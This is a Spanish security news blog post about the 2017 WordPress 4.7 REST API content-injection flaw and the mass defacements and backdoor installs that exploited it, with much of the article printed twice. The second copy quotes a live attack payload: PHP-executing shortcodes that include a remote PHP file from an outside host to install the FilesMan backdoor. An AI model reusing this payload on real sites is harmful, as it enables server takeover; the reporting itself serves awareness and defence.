Tutoriales y Manuales
Entradas Mensuales
-
►
2024
(Total:
1019
)
- ► septiembre (Total: 50 )
-
►
2023
(Total:
710
)
- ► septiembre (Total: 65 )
-
►
2022
(Total:
967
)
- ► septiembre (Total: 72 )
-
►
2021
(Total:
730
)
- ► septiembre (Total: 56 )
-
►
2020
(Total:
212
)
- ► septiembre (Total: 21 )
-
►
2019
(Total:
102
)
- ► septiembre (Total: 14 )
-
▼
2017
(Total:
231
)
- ► septiembre (Total: 16 )
-
▼
febrero
(Total:
36
)
- Quitando a los usuarios de Windows los derechos de...
- Un fallo en CloudFlare expone datos privados de su...
- AMD presenta oficialmente Ryzen R7 y alcanza en re...
- Un fan de NVIDIA asesina en Rusia un fan de AMD
- Google anuncia la primera colisión de SHA1
- RootedCON 2017 se celebra durante los días 2, 3 y ...
- Microsoft retrasa sus actualizaciones de seguridad...
- Con sólo 15 años hackeó ordenadores de la NASA
- Presentan como prodigio en informática a joven que...
- DEFT Zero presenta su edición 2017 para el análisi...
- El 0-Day de WordPress permite el hackeo de 1,5 mil...
- 8 tarjetas gráficas GTX 1080 conectadas para crack...
- Un nuevo fallo grave provoca DoS al software BIND DNS
- Universidad sufre un ataque DDoS de sus propios di...
- El 75% de todo el Ransomware es desarrollado por r...
- WhatsApp incorpora verificación en dos pasos
- Vulnerabilidades en las cerraduras inteligentes Bl...
- Solucionada vulnerabilidad XSS en Steam de Valve
- La Policía interviene en Málaga una operadora por ...
- Un sofisticado malware en memoria está infectando ...
- De nuevo hackean impresoras vulnerables imprimiend...
- El vendedor de Smart TV Vizio multado con 2.2$ mil...
- Un hacker tumba más de 10 mil páginas de la dark w...
- Ransomware Charger secuestra tu teléfono a cambio ...
- Una multa de tráfico falsa de la DGT infecta tu or...
- Cómo Google manejó el mayor ataque DDoS de la Botn...
- Documental: Big Data, conviviendo con el algoritmo
- Rusia detiene a varios expertos en ciberseguridad ...
- Nuevas vulnerabilidades críticas en routers Netgear
- Dos arrestados en Londres por infectar la red CCTV...
- 0-day en SMB afecta a múltipes versiones de Window...
- Windows Defender ATP te protegerá del Ransomware
- Gobierno holandés contará todas las papeletas a ma...
- Backblaze publica su ranking de fiabilidad de disc...
- Apple elimina iCloud Activation Lock Page por un f...
- Nueva actualización de seguridad para WordPress
-
►
2016
(Total:
266
)
- ► septiembre (Total: 38 )
-
►
2015
(Total:
445
)
- ► septiembre (Total: 47 )
-
►
2014
(Total:
185
)
- ► septiembre (Total: 18 )
-
►
2013
(Total:
100
)
- ► septiembre (Total: 3 )
-
►
2011
(Total:
7
)
- ► septiembre (Total: 1 )
Blogroll
Etiquetas
seguridad
(
395
)
privacidad
(
363
)
google
(
353
)
ransomware
(
338
)
vulnerabilidad
(
301
)
Malware
(
263
)
Windows
(
243
)
android
(
242
)
cve
(
235
)
tutorial
(
235
)
manual
(
220
)
software
(
201
)
hardware
(
193
)
linux
(
124
)
twitter
(
115
)
ddos
(
94
)
WhatsApp
(
90
)
Wifi
(
85
)
cifrado
(
77
)
herramientas
(
75
)
hacking
(
73
)
sysadmin
(
67
)
app
(
65
)
Networking
(
56
)
nvidia
(
52
)
ssd
(
51
)
youtube
(
50
)
adobe
(
43
)
firmware
(
42
)
office
(
41
)
hack
(
40
)
firefox
(
35
)
contraseñas
(
32
)
eventos
(
32
)
antivirus
(
31
)
juegos
(
31
)
cms
(
30
)
flash
(
28
)
anonymous
(
27
)
MAC
(
25
)
apache
(
25
)
programación
(
25
)
exploit
(
23
)
javascript
(
22
)
multimedia
(
22
)
Kernel
(
20
)
ssl
(
19
)
SeguridadWireless
(
17
)
documental
(
16
)
Forense
(
15
)
conferencia
(
15
)
Debugger
(
14
)
lizard squad
(
14
)
técnicas hacking
(
13
)
auditoría
(
12
)
delitos
(
11
)
metasploit
(
11
)
Virtualización
(
10
)
adamo
(
9
)
reversing
(
9
)
Rootkit
(
8
)
Ehn-Dev
(
7
)
MAC Adress
(
6
)
antimalware
(
6
)
oclHashcat
(
5
)
Entradas populares
-
Después de ver qué es una vCPU y la diferencia entre núcleos (cores) e hilos en los procesadores, pasamos a explicar toda la nomenclatura d...
-
En el panorama en constante evolución de la seguridad de redes, OpnSense se ha convertido en una formidable solución de firewall. Nacido de...
-
Pese a que Gemini ofrece multitudes de opciones, recientemente, se ha dado a conocer una situación fuera de lo común. Hace unos días, un es...
El 0-Day de WordPress permite el hackeo de 1,5 millones de sitios web
miércoles, 15 de febrero de 2017
|
Publicado por
el-brujo
|
Editar entrada
El reciente grave fallo de seguridad de WordPress ha sido explotado masivamente para hackear más de 1,5 millones de sitios web. De acuerdo con la firma de seguridad WordFence, el fallo de inyección de
contenido en WordPress recientemente divulgada ya ha sido explotada de forma masiva.
Con el fin de evitar la exposición de los sitios web, la comunidad de WordPress retrasó más de una semana la divulgación de la vulnerabilidad para trabajar con expertos en seguridad y compañías de hosting en la creación de un parche definitivo, que tendría que ser libreado poco después de que la vulnerabilidad se hiciera pública.
La vulnerabilidad fue descubierta por un investigador de seguridad en la empresa Sucuri, quien explicó que el fallo podría ser explotada por un atacante no autenticado para inyectar contenido malicioso así como para la escalada de privilegios.
El atacante podría explotar el fallo de inyección de contenido de día cero para modificar publicaciones, páginas, así como cualquier otro contenido.
La API REST está habilitada de forma predeterminada en todos los sitios que usan WordPress 4.7 o 4.7.1. Si su sitio web está en estas versiones de WordPress entonces es actualmente vulnerable a este error. "
Al menos 18 millones de sitios web ejecutan el popular WordPress CMS, aproximadamente el 26% de los 10.000 sitios web principales ejecutan WordPress.
Expertos de Sucuri han trabajado con el equipo de desarrollo de WordPress que fijó la vulnerabilidad de inyección de contenido cero en la última versión 4.7.2 emitida el 26 de enero.
La mala noticia es que muchos sitios web de WordPress aún no han sido actualizados dejando la instalación abierta a los ataques.
Expertos de Sucuri informaron de los primeros ataques aprovechando la vulnerabilidad anterior menos de 48 horas después de su divulgación.
"En menos de 48 horas después de que se revelara la vulnerabilidad, vimos múltiples exploits públicos compartidos y publicados en línea. Con esa información fácilmente disponible, se iniciaron los intentos de sondaje y explotación a nivel de Internet ", afirma un informe publicado por Sucuri.
Los expertos observaron varias campañas de desfiguración masivas dirigidas a WordPress en todo el mundo, en una de estas campañas, los hackers reemplazaron el contenido de más de 60.000 páginas web con declaraciones "Hacked by".
Los atacantes han encontrado una manera de escalar la falla benigna de WordPress REST API y usarla para obtener acceso completo al servidor de una víctima mediante la instalación de una puerta trasera oculta. El 26 de enero, el equipo de WordPress lanzó WordPress 4.7.2, que contenía una corrección secreta que abordaba una vulnerabilidad en la API de WordPress REST.
Debido a que el equipo de WordPress temía que los atacantes explotaran este fallo de inmediato, no incluyeron detalles sobre el error en el anuncio original y sólo revelaron su presencia después de una semana, después de que un número sustancial de usuarios actualizaron sus blogs.
La gran mayoría de estos ataques habían sido ataques sencillos, en los que las tripulaciones de hacking sólo garabateaban su nombre en un sitio, y nada más.
Los ataques de WordPress REST API se vuelven más desagradables
Hacia el final de la semana pasada, las cosas se pusieron feas, de acuerdo con la empresa de seguridad de WordPress, Sucuri, quien reportó haber visto los primeros ataques que también involucraron intentos de ejecución remota de código.
Según Sucuri, los atacantes estaban elaborando mensajes especiales de degradación que incluían una lista de códigos cortos de WordPress.
Después de una mirada más atenta a estos códigos cortos, el equipo de Sucuri se dio cuenta de que eran los códigos cortos de los complementos de WordPress que permitían a los webmasters incluir código PHP personalizado dentro del contenido de texto de sus páginas y que el motor de WordPress lo ejecutara.
En términos más simples, los atacantes encontraron una forma de enviar su propio código PHP a los sitios de WordPress a través de la falla REST API, que hasta entonces sólo se utilizaba para alterar el texto preexistente.
El fragmento de código fuente anterior, visto en ataques en vivo, diría al motor de WordPress que ejecute el siguiente comando de PHP cada vez que un usuario acceda a esa página en particular.
Esta línea de código PHP incluiría un archivo PHP remoto en el sitio de la víctima, el cual descargaría e instalaría la puerta trasera de FilesMan PHP en la carpeta WordPress / wp-content / uploads /.
Después de enviar su solicitud HTTP a la API REST de WordPress de un sitio, un atacante sólo tendría que acceder a la página desfigurada una vez y, a continuación, acceder a la puerta trasera y asumir el control del servidor subyacente de la víctima.
Fuentes:
https://www.bleepingcomputer.com/news/security/wordpress-rest-api-flaw-used-to-install-backdoors/
http://securityaffairs.co/wordpress/56166/hacking/wordpress-flaw.html
Grave Vulnerabiliad en WordPress REST API
Con el fin de evitar la exposición de los sitios web, la comunidad de WordPress retrasó más de una semana la divulgación de la vulnerabilidad para trabajar con expertos en seguridad y compañías de hosting en la creación de un parche definitivo, que tendría que ser libreado poco después de que la vulnerabilidad se hiciera pública.
La vulnerabilidad fue descubierta por un investigador de seguridad en la empresa Sucuri, quien explicó que el fallo podría ser explotada por un atacante no autenticado para inyectar contenido malicioso así como para la escalada de privilegios.
El atacante podría explotar el fallo de inyección de contenido de día cero para modificar publicaciones, páginas, así como cualquier otro contenido.
La API REST está habilitada de forma predeterminada en todos los sitios que usan WordPress 4.7 o 4.7.1. Si su sitio web está en estas versiones de WordPress entonces es actualmente vulnerable a este error. "
Al menos 18 millones de sitios web ejecutan el popular WordPress CMS, aproximadamente el 26% de los 10.000 sitios web principales ejecutan WordPress.
Expertos de Sucuri han trabajado con el equipo de desarrollo de WordPress que fijó la vulnerabilidad de inyección de contenido cero en la última versión 4.7.2 emitida el 26 de enero.
La mala noticia es que muchos sitios web de WordPress aún no han sido actualizados dejando la instalación abierta a los ataques.
Expertos de Sucuri informaron de los primeros ataques aprovechando la vulnerabilidad anterior menos de 48 horas después de su divulgación.
"En menos de 48 horas después de que se revelara la vulnerabilidad, vimos múltiples exploits públicos compartidos y publicados en línea. Con esa información fácilmente disponible, se iniciaron los intentos de sondaje y explotación a nivel de Internet ", afirma un informe publicado por Sucuri.
Los expertos observaron varias campañas de desfiguración masivas dirigidas a WordPress en todo el mundo, en una de estas campañas, los hackers reemplazaron el contenido de más de 60.000 páginas web con declaraciones "Hacked by".
Los atacantes han encontrado una manera de escalar la falla benigna de WordPress REST API y usarla para obtener acceso completo al servidor de una víctima mediante la instalación de una puerta trasera oculta. El 26 de enero, el equipo de WordPress lanzó WordPress 4.7.2, que contenía una corrección secreta que abordaba una vulnerabilidad en la API de WordPress REST.
Debido a que el equipo de WordPress temía que los atacantes explotaran este fallo de inmediato, no incluyeron detalles sobre el error en el anuncio original y sólo revelaron su presencia después de una semana, después de que un número sustancial de usuarios actualizaron sus blogs.
La gran mayoría de estos ataques habían sido ataques sencillos, en los que las tripulaciones de hacking sólo garabateaban su nombre en un sitio, y nada más.
Los ataques de WordPress REST API se vuelven más desagradables
Hacia el final de la semana pasada, las cosas se pusieron feas, de acuerdo con la empresa de seguridad de WordPress, Sucuri, quien reportó haber visto los primeros ataques que también involucraron intentos de ejecución remota de código.
Según Sucuri, los atacantes estaban elaborando mensajes especiales de degradación que incluían una lista de códigos cortos de WordPress.
Después de una mirada más atenta a estos códigos cortos, el equipo de Sucuri se dio cuenta de que eran los códigos cortos de los complementos de WordPress que permitían a los webmasters incluir código PHP personalizado dentro del contenido de texto de sus páginas y que el motor de WordPress lo ejecutara.
En términos más simples, los atacantes encontraron una forma de enviar su propio código PHP a los sitios de WordPress a través de la falla REST API, que hasta entonces sólo se utilizaba para alterar el texto preexistente.
Contenido: "[insert_php] include ('http [:] // acommeamour.fr/tmp/xx.php'); [/ insert_php]
[Php] include ('http [:] // acommeamour.fr/tmp/xx.php'); [/ Php] ",
"Id": "61a"}
El fragmento de código fuente anterior, visto en ataques en vivo, diría al motor de WordPress que ejecute el siguiente comando de PHP cada vez que un usuario acceda a esa página en particular.
Include ('http [:] // acommeamour.fr/tmp/xx.php');
Esta línea de código PHP incluiría un archivo PHP remoto en el sitio de la víctima, el cual descargaría e instalaría la puerta trasera de FilesMan PHP en la carpeta WordPress / wp-content / uploads /.
Después de enviar su solicitud HTTP a la API REST de WordPress de un sitio, un atacante sólo tendría que acceder a la página desfigurada una vez y, a continuación, acceder a la puerta trasera y asumir el control del servidor subyacente de la víctima.
Fuentes:
https://www.bleepingcomputer.com/news/security/wordpress-rest-api-flaw-used-to-install-backdoors/
http://securityaffairs.co/wordpress/56166/hacking/wordpress-flaw.html
Enviar por correo electrónico
Escribe un blog
Compartir en X
Compartir con Facebook
Compartir en Pinterest
0 comentarios :
Publicar un comentario
Los comentarios pueden ser revisados en cualquier momento por los moderadores.
Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.
Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.